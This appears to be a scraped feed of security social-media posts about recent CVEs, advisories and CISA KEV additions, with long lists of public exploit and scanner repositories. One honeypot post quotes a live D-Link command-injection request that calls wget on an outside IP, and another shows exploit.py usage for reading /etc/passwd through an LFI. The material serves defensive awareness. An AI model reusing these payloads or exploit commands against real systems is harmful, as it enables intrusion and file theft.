GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15059/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T06:31:24
1 posts
π΄ CVE-2025-15061 - Critical (9.8)
Framelink Figma MCP Server fetchWithRetry Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Framelink Figma MCP Server. Authentication is not re...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15061/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T06:31:24
1 posts
π CVE-2025-15350 - High (7.8)
Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is re...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15350/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T06:31:23
1 posts
π CVE-2025-15348 - High (7.8)
Anritsu ShockLine CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu ShockLine. User interaction is requ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15348/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T00:31:24
1 posts
Hubitat Patches Critical Authorization Bypass in Elevation Hubs
Hubitat patched a critical authorization bypass vulnerability (CVE-2026-1201) in its Elevation Hubs that allowed authenticated users to gain unauthorized control over connected devices.
**Make sure all Hubitat devices are isolated from the internet and accessible from trusted networks only. Also, limit the access only to trusted users and educate them on risks of malware, infostealers, password recycling and phishing. Then plan an update cycle for your Hubitat Elevation Hub to firmware version 2.4.2.157.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/hubitat-patches-critical-authorization-bypass-in-elevation-hubs-n-y-3-f-v/gD2P6Ple2L
updated 2026-01-23T00:31:24
1 posts
If you missed this, Microsoft posted several security updates yesterday, all of them critical, affecting Microsoft accounts, Copilot, Office, Azure, and Entra: https://msrc.microsoft.com/update-guide
Noteworthy:
- Microsoft Account Spoofing Vulnerability: CVE-2026-21264 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21264
- Azure Entra ID Elevation of Privilege Vulnerability: CVE-2026-24305 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24305
- Azure Front Door Elevation of Privilege Vulnerability: CVE-2026-24306 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24306 #infosec #Microsoft #Azure #Copilot #vulnerability
##updated 2026-01-23T00:31:24
1 posts
1 repos
If you missed this, Microsoft posted several security updates yesterday, all of them critical, affecting Microsoft accounts, Copilot, Office, Azure, and Entra: https://msrc.microsoft.com/update-guide
Noteworthy:
- Microsoft Account Spoofing Vulnerability: CVE-2026-21264 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21264
- Azure Entra ID Elevation of Privilege Vulnerability: CVE-2026-24305 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24305
- Azure Front Door Elevation of Privilege Vulnerability: CVE-2026-24306 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24306 #infosec #Microsoft #Azure #Copilot #vulnerability
##updated 2026-01-23T00:31:17
1 posts
Multiple Vulnerabilities Reported in EVMAPA Electric Vehicle Charging Systems
CISA reports three vulnerabilities in EVMAPA charging station management software, including a critical authentication bypass (CVE-2025-54816) that allows remote command execution and service disruption.
**Make sure all EVAMPA managed systems are isolated from the internet and accessible from trusted networks only. Two of the three laws don't have a patch yet, so your priority control is isolation. Then reach to the vendor for more details on upcoming patches.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/multiple-vulnerabilities-reported-in-evmapa-electric-vehicle-charging-systems-a-b-2-2-b/gD2P6Ple2L
updated 2026-01-22T22:30:06
1 posts
π CVE-2026-20613 - High (7.8)
The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file i...
π https://www.thehackerwire.com/vulnerability/CVE-2026-20613/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-22T21:52:57
1 posts
3 repos
https://github.com/ShinP451/scavenger_scanner
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability
CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability
CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability
CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability
CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability
##updated 2026-01-22T21:47:41
1 posts
7 repos
https://github.com/nkuty/CVE-2025-30208-31125-31486-32395
https://github.com/xuemian168/CVE-2025-30208
https://github.com/sunhuiHi666/CVE-2025-31125
https://github.com/0xgh057r3c0n/CVE-2025-31125
https://github.com/MuhammadWaseem29/Vitejs-exploit
https://github.com/harshgupptaa/Path-Transversal-CVE-2025-31125-
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability
CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability
CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability
CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability
CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability
##updated 2026-01-22T09:31:48
1 posts
2 repos
https://github.com/Galaxy-sc/CVE-2026-0920-WordPress-LA-Studio-Exploit
20,000 WordPress Sites Exposed to Backdoor in LA-Studio Element Kit
LA-Studio patched a critical backdoor in its Element Kit for Elementor plugin (CVE-2026-0920) that allowed unauthenticated attackers to create administrator accounts. The malicious code was planted by a former employee and affected over 20,000 WordPress websites.
**If you are using Element Kit for Elementor, this is URGENT. Your plugin may have an active backdoor. Update the LA-Studio Element Kit plugin to version 1.6.0 immediately to remove the backdoor and review your Wordpress server users for unexpected user accounts.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/20000-wordpress-sites-exposed-to-backdoor-in-la-studio-element-kit-h-0-g-u-q/gD2P6Ple2L
updated 2026-01-20T21:31:34
1 posts
Critical Command Injection Vulnerability in Legacy Vivotek Cameras
Akamai SIRT discovered a critical command injection vulnerability (CVE-2026-22755) in legacy Vivotek cameras that allows unauthenticated attackers to execute arbitrary code as root.
**If you are using Vivotek cameras, this is important and urgent. Make sure your cameras are isolated from the internet and accessible from trusted networks only. Check and enforce password authentication. Then check your firmware version and if there's an update, patch ASAP. For end-of-life devices, isolate them, enforce passwords and plan a replacement process.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-command-injection-vulnerability-in-legacy-vivotek-cameras-s-y-d-d-o/gD2P6Ple2L
updated 2026-01-13T18:31:18
1 posts
Microslop is a bit late for the new year celebration (or a bit early for Chinese new year).
Either way they're starting/ending the year with a banger: CVE-2026-20965
Being able to steal Global Admin token and labeling it a medium severity.
##updated 2025-12-09T16:53:25
1 posts
100 repos
https://github.com/ynsmroztas/NextRce
https://github.com/kOaDT/poc-cve-2025-55182
https://github.com/assetnote/react2shell-scanner
https://github.com/pyroxenites/Nextjs_RCE_Exploit_Tool
https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension
https://github.com/Chocapikk/CVE-2025-55182
https://github.com/Rsatan/Next.js-Exploit-Tool
https://github.com/Ashwesker/Ashwesker-CVE-2025-55182
https://github.com/VeilVulp/RscScan-cve-2025-55182
https://github.com/BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js
https://github.com/xkillbit/cve-2025-55182-scanner
https://github.com/freeqaz/react2shell
https://github.com/sickwell/CVE-2025-55182
https://github.com/chrahman/react2shell-CVE-2025-55182-full-rce-script
https://github.com/MoLeft/React2Shell-Toolbox
https://github.com/MemerGamer/CVE-2025-55182
https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc
https://github.com/keklick1337/CVE-2025-55182-golang-PoC
https://github.com/zack0x01/CVE-2025-55182-advanced-scanner-
https://github.com/LemonTeatw1/CVE-2025-55182-exploit
https://github.com/msanft/CVE-2025-55182
https://github.com/Spritualkb/CVE-2025-55182-exp
https://github.com/ejpir/CVE-2025-55182-bypass
https://github.com/aliclub0x00/CVE-2025-55182-POC-NEXTJS
https://github.com/emredavut/CVE-2025-55182
https://github.com/yz9yt/React2Shell-CTF
https://github.com/CymulateResearch/React2Shell-Scanner
https://github.com/yanoshercohen/React2Shell_CVE-2025-55182
https://github.com/Pizz33/CVE-2025-55182-burpscanner
https://github.com/ThemeHackers/CVE-2025-55182
https://github.com/momika233/CVE-2025-55182-bypass
https://github.com/StealthMoud/CVE-2025-55182-Scanner
https://github.com/songsanggggg/CVE-2025-55182
https://github.com/fBUZk2BH/RSC-Detect-CVE-2025-55182
https://github.com/nehkark/CVE-2025-55182
https://github.com/hoosin/CVE-2025-55182
https://github.com/kondukto-io/vulnerable-next-js-poc
https://github.com/fullhunt/react2shell-test-server
https://github.com/CirqueiraDev/MassExploit-CVE-2025-55182
https://github.com/zack0x01/vuln-app-CVE-2025-55182
https://github.com/Faithtiannn/CVE-2025-55182
https://github.com/BlackTechX011/React2Shell
https://github.com/c0rydoras/CVE-2025-55182
https://github.com/pax-k/react2shell-CVE-2025-55182-full-rce-script
https://github.com/ZihxS/check-react-rce-cve-2025-55182
https://github.com/gensecaihq/react2shell-scanner
https://github.com/heiheishushu/rsc_detect_CVE-2025-55182
https://github.com/mrknow001/RSC_Detector
https://github.com/techgaun/cve-2025-55182-scanner
https://github.com/fatguru/CVE-2025-55182-scanner
https://github.com/Saturate/CVE-2025-55182-Scanner
https://github.com/Cillian-Collins/CVE-2025-55182
https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell
https://github.com/vijay-shirhatti/RSC-Detect-CVE-2025-55182
https://github.com/whiteov3rflow/CVE-2025-55182-poc
https://github.com/Updatelap/CVE-2025-55182
https://github.com/logesh-GIT001/CVE-2025-55182
https://github.com/theori-io/reactguard
https://github.com/subhdotsol/CVE-2025-55182
https://github.com/websecuritylabs/React2Shell-Library
https://github.com/xcanwin/CVE-2025-55182-React-RCE
https://github.com/hackersatyamrastogi/react2shell-ultimate
https://github.com/sumanrox/rschunter
https://github.com/jf0x3a/CVE-2025-55182-exploit
https://github.com/Tiger-Foxx/exploit-react-CVE-2025-55182
https://github.com/AliHzSec/CVE-2025-55182
https://github.com/zzhorc/CVE-2025-55182
https://github.com/timsonner/React2Shell-CVE-2025-55182
https://github.com/RuoJi6/CVE-2025-55182-RCE-shell
https://github.com/EynaExp/CVE-2025-55182-POC
https://github.com/kavienanj/CVE-2025-55182
https://github.com/acheong08/CVE-2025-55182-poc
https://github.com/surajhacx/react2shellpoc
https://github.com/dwisiswant0/CVE-2025-55182
https://github.com/mbanyamer/React2Shell
https://github.com/im-ezboy/CVE-2025-55182-zoomeye
https://github.com/TrixSec/CVE-2025-55182-Scanner
https://github.com/cybertechajju/R2C-CVE-2025-55182-66478
https://github.com/l4rm4nd/CVE-2025-55182
https://github.com/alsaut1/react2shell-lab
https://github.com/xalgord/React2Shell
https://github.com/sudo-Yangziran/CVE-2025-55182POC
https://github.com/sho-luv/React2Shell
https://github.com/BeichenDream/CVE-2025-55182-GodzillaMemoryShell
https://github.com/anuththara2007-W/CVE-2025-55182-Exploit-extension
https://github.com/theman001/CVE-2025-55182
https://github.com/hidden-investigations/react2shell-scanner
https://github.com/MrR0b0t19/CVE-2025-55182-shellinteractive
https://github.com/SainiONHacks/CVE-2025-55182-Scanner
https://github.com/shyambhanushali/React2Shell
https://github.com/Cr4at0r/Next.js-RCE-Scanner-BurpSuite-Extension-
https://github.com/alfazhossain/CVE-2025-55182-Exploiter
https://github.com/santihabib/CVE-2025-55182-analysis
https://github.com/zr0n/react2shell
https://github.com/ejpir/CVE-2025-55182-research
https://github.com/shamo0/react2shell-PoC
https://github.com/GelukCrab/React-Server-Components-RCE
https://github.com/hualy13/CVE-2025-55182
https://github.com/onlylovetx/CVE-2025-55182-CVE-2025-66478-Exploit-GUI
CVE-2025-55182 to attack Russian companies
#CVE_2025_55182 #RustoBot
https://bi-zone.medium.com/adversaries-exploit-cve-2025-55182-to-attack-russian-companies-1b4e98ca5804
updated 2025-11-14T02:00:02.350000
1 posts
Join @vulncheck next week for our new In the Wild webcast series! This month, our research team will do a deep dive on developing an exploit for Gladinet Triofox CVE-2025-12480, a process that wound up being significantly more complex than expected.
Wednesday, Jan. 28 @ 1 PM ET (and the last Wednesday of every month!)
https://wwv.vulncheck.com/in-the-wild-with-vulncheck-webinar-series
##updated 2025-11-06T18:32:50
2 posts
π’ CVE-2025-12556 : exΓ©cution de code en Β« 1 clic Β» dans IDIS Cloud Manager Viewer (Windows)
π Selon Team82, une faille critique dans IDIS Cloud Manager Viewer (ICM) permet une exΓ©cut...
π cyberveille : https://cyberveille.ch/posts/2026-01-27-cve-2025-12556-execution-de-code-en-1-clic-dans-idis-cloud-manager-viewer-windows/
π source : https://claroty.com/team82/research/new-architecture-new-risks-one-click-to-pwn-idis-ip-cameras
#CVE_2025_12556 #IDIS_Cloud_Manager #Cyberveille
π’ CVE-2025-12556 : exΓ©cution de code en Β« 1 clic Β» dans IDIS Cloud Manager Viewer (Windows)
π Selon Team82, une faille critique dans IDIS Cloud Manager Viewer (ICM) permet une exΓ©cut...
π cyberveille : https://cyberveille.ch/posts/2026-01-27-cve-2025-12556-execution-de-code-en-1-clic-dans-idis-cloud-manager-viewer-windows/
π source : https://claroty.com/team82/research/new-architecture-new-risks-one-click-to-pwn-idis-ip-cameras
#CVE_2025_12556 #IDIS_Cloud_Manager #Cyberveille
updated 2025-11-06T13:58:13.620000
1 posts
3 repos
https://github.com/haspiranti/CVE-2025-41244-PoC
New. This addresses CVE-2025-48384 and CVE-2025-41244.
Dell Security Update for CloudBoost Virtual Appliance Multiple Vulnerabilities https://www.dell.com/support/kbdoc/en-us/000419894/dsa-2026-025-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities #Dell #infosec #vulnerability
##updated 2025-11-03T20:16:00.937000
1 posts
updated 2025-11-03T18:32:42
2 posts
1 repos
NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution
NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.
**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/netsupport-manager-zero-day-flaws-enable-unauthenticated-remote-code-execution-5-g-z-x-b/gD2P6Ple2L
You like technical deep dives into binary exploitation and crazy heap wizardry? Then you'll like our blog post about unauth'ed RCE in NetSupport Manager aka CVE-2025-34164 & CVE-2025-34165 https://code-white.com/blog/2026-01-nsm-rce/
##updated 2025-10-22T00:34:26
7 posts
27 repos
https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit
https://github.com/pentestfunctions/best-CVE-2025-8088
https://github.com/ghostn4444/CVE-2025-8088
https://github.com/Ashwesker/Ashwesker-CVE-2025-8088
https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC
https://github.com/nhattanhh/CVE-2025-8088
https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-
https://github.com/techcorp/CVE-2025-8088-Exploit
https://github.com/nuky-alt/CVE-2025-8088
https://github.com/Markusino488/cve-2025-8088
https://github.com/hbesljx/CVE-2025-8088-EXP
https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC
https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal
https://github.com/walidpyh/CVE-2025-8088
https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder
https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability
https://github.com/lucyna77/winrar-exploit
https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR
https://github.com/ilhamrzr/RAR-Anomaly-Inspector
https://github.com/jordan922/CVE-2025-8088
https://github.com/travisbgreen/cve-2025-8088
https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool
https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document
https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC
https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool
https://github.com/pescada-dev/-CVE-2025-8088
https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition
WinRAR Under Siege: High-Severity CVE-2025-8088 Exploit Abused by State-Sponsored and Cybercriminal Actors
A critical WinRAR vulnerability, CVE-2025-8088, is currently being exploited by multiple threat actors worldwide, spanning both state-sponsored espionage groups and financially motivated cybercriminals. This flaw, which enables path traversal via Alternate Data Streams (ADS), allows attackers to stealthily drop malicious files in arbitrary system locations.β¦
##Hackers are using a single booby-trapped archive file to sneak malware past security tools and hide it where you would never think to look. Here is how the WinRAR flaw is letting them get away with it
##WinRAR path traversal flaw still exploited by numerous hackers
Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for...
ποΈ [Bleepingcomputer] https://link.is.it/dx1ikK
##New. Self-promotion goes without saying, never mind the all-invasive Gmail AI.
π "We also recommend the use of Google Safe Browsing and Gmail, which actively identifies and blocks files containing the exploit."
Google Threat Intelligence Group: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability #Google #windows #Microsoft #threatintel #threatintelligence
##Hackers are using a single booby-trapped archive file to sneak malware past security tools and hide it where you would never think to look. Here is how the WinRAR flaw is letting them get away with it
##WinRAR path traversal flaw still exploited by numerous hackers
Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for...
ποΈ [Bleepingcomputer] https://link.is.it/dx1ikK
##New. Self-promotion goes without saying, never mind the all-invasive Gmail AI.
π "We also recommend the use of Google Safe Browsing and Gmail, which actively identifies and blocks files containing the exploit."
Google Threat Intelligence Group: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability #Google #windows #Microsoft #threatintel #threatintelligence
##updated 2025-10-22T00:33:23
1 posts
185.93.89.75 was a busy bee today! Attempting Realtek Jungle SDK formWsc Injection aimed mostly @ the U.S.
That SDK is used in RTL819x series chipsets (RTL819xD and related) that provide wireless capabilities for a broad range of IoT devices. Based on the ONEKEY/IoT Inspector research that disclosed CVE-2021-35394 and related vulnerabilities.
Wonder what mischief they're up to?
##updated 2025-10-22T00:31:50
1 posts
2 repos
Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.
An example request:
SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0
updated 2025-08-30T00:30:35
2 posts
1 repos
NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution
NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.
**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/netsupport-manager-zero-day-flaws-enable-unauthenticated-remote-code-execution-5-g-z-x-b/gD2P6Ple2L
You like technical deep dives into binary exploitation and crazy heap wizardry? Then you'll like our blog post about unauth'ed RCE in NetSupport Manager aka CVE-2025-34164 & CVE-2025-34165 https://code-white.com/blog/2026-01-nsm-rce/
##updated 2025-06-20T19:08:08.187000
1 posts
4 repos
https://github.com/mbadanoiu/CVE-2024-37081
https://github.com/CERTologists/-CVE-2024-37081-POC
As it is public now* I'm able to talk about it.
Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.
> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37079
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37080
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37081
* technically since Friday.
##updated 2025-04-09T03:38:26
1 posts
OMG. -froot bug resurfaced. https://seclists.org/oss-sec/2026/q1/89
I see the headlines, "10 years old bug".
My friends, this bug is older. Much older. Not this particular instance, but it is a classical mistake to make. It's a command line injection when calling the login executable.
Some people point to CVE-2007-0882. Solaris had that, almost 20 years ago.
But it's even older than that. It's so old it predates the CVE system. I don't remember exact dates, but we popped Linux and AIX boxes with that, mid 90s.
But it is *even older* than that. Have a look at System V R4, Β©1990, getty calling login with unsanitized input:
But how deep does the rabbit hole go? When was this bug introduced?
Getty called login with user input since the dawn of time (UNIX V2, 1972):
https://www.tuhs.org/cgi-bin/utree.pl?file=V2/cmd/getty.s
But this predates command line arguments in login:
https://www.tuhs.org/cgi-bin/utree.pl?file=V2/cmd/login.s
So, when did this particular command line feature of login appear?
In the BSD universe, -f was introduced with POSIX compatibilitiy in 4.3BSD-Reno:
https://www.tuhs.org/cgi-bin/utree.pl?file=4.3BSD-Reno/src/usr.bin/login/login.c
But someone paid attention and filtered out user names starting with - in getty:
https://www.tuhs.org/cgi-bin/utree.pl?file=4.3BSD-Reno/src/libexec/getty/main.c
RCS timestamp says 6/29/1990, so same age as SysV R4.
The original 4.3BSD (1986) doesn't filter the user name:
https://www.tuhs.org/cgi-bin/utree.pl?file=4.3BSD/usr/src/etc/getty/main.c
And it does have a -r option in login:
https://www.tuhs.org/cgi-bin/utree.pl?file=4.3BSD/usr/src/bin/login.c
Exploitable? No idea, argv processing might be a problem. I'll find out another day.
In conclusion: bug existed since 1990, it's so easy to make when implementing POSIX that it keeps resurfacing, and at least one person in Berkeley knew since day 0.
##updated 2025-03-28T06:30:37
2 posts
9 repos
https://github.com/iteride/CVE-2025-2294
https://github.com/romanedutov/CVE-2025-2294
https://github.com/0xWhoami35/CVE-2025-2294
https://github.com/mrrivaldo/CVE-2025-2294
https://github.com/r0otk3r/CVE-2025-2294
https://github.com/Yucaerin/CVE-2025-2294
https://github.com/rhz0d/CVE-2025-2294
https://github.com/Nxploited/CVE-2025-2294
https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker
βΌοΈ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion
GitHub: https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker
CVSS: 9.8
Usage:
usage: exploit.py [-h] -u URL [-f FILE]
options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., https://example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)
Example:
python3 exploit.py -u https://example.com -f /etc/passwd
##βΌοΈ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion
GitHub: https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker
CVSS: 9.8
Usage:
usage: exploit.py [-h] -u URL [-f FILE]
options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., https://example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)
Example:
python3 exploit.py -u https://example.com -f /etc/passwd
##updated 2025-03-13T15:33:36
1 posts
As it is public now* I'm able to talk about it.
Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.
> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37079
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37080
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37081
* technically since Friday.
##updated 2024-11-21T05:05:11.403000
1 posts
@bradwilson @xunit well well, just because we are not running something in production doesnβt mean it canβt have vulnerablilities ππ
https://nvd.nist.gov/vuln/detail/cve-2020-15250?utm_source=chatgpt.com
##π΄ CVE-2026-24770 - Critical (9.8)
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24770/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24770 - Critical (9.8)
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24770/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24741 - High (8.1)
ConvertXis a self-hosted online file converter. In versions prior to 0.17.0, the `POST /delete` endpoint uses a user-controlled `filename` value to construct a filesystem path and deletes it via `unlink` without sufficient validation. By supplying...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24741/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24741 - High (8.1)
ConvertXis a self-hosted online file converter. In versions prior to 0.17.0, the `POST /delete` endpoint uses a user-controlled `filename` value to construct a filesystem path and deletes it via `unlink` without sufficient validation. By supplying...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24741/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24783 - High (7.5)
soroban-fixed-point-math is a fixed-point math library for Soroban smart contacts. In versions 1.3.0 and 1.4.0, the `mulDiv(x, y, z)` function incorrectly handled cases where both the intermediate product $x * y$ and the divisor $z$ were negative....
π https://www.thehackerwire.com/vulnerability/CVE-2026-24783/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24783 - High (7.5)
soroban-fixed-point-math is a fixed-point math library for Soroban smart contacts. In versions 1.3.0 and 1.4.0, the `mulDiv(x, y, z)` function incorrectly handled cases where both the intermediate product $x * y$ and the divisor $z$ were negative....
π https://www.thehackerwire.com/vulnerability/CVE-2026-24783/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24736 - Critical (9.1)
Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24736/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24736 - Critical (9.1)
Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24736/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24736 - Critical (9.1)
Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24736/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24736 - Critical (9.1)
Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24736/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##βΌοΈ CVE-2026-22794: Appsmith Password Reset Account Takeover via Origin Header Injection
GitHub: https://github.com/MalikHamza7/CVE-2026-22794-POC
CVSS: 9.6
##βΌοΈ CVE-2026-22794: Appsmith Password Reset Account Takeover via Origin Header Injection
GitHub: https://github.com/MalikHamza7/CVE-2026-22794-POC
CVSS: 9.6
##π CVE-2026-22259 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-22259 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-22258 - High (7.5)
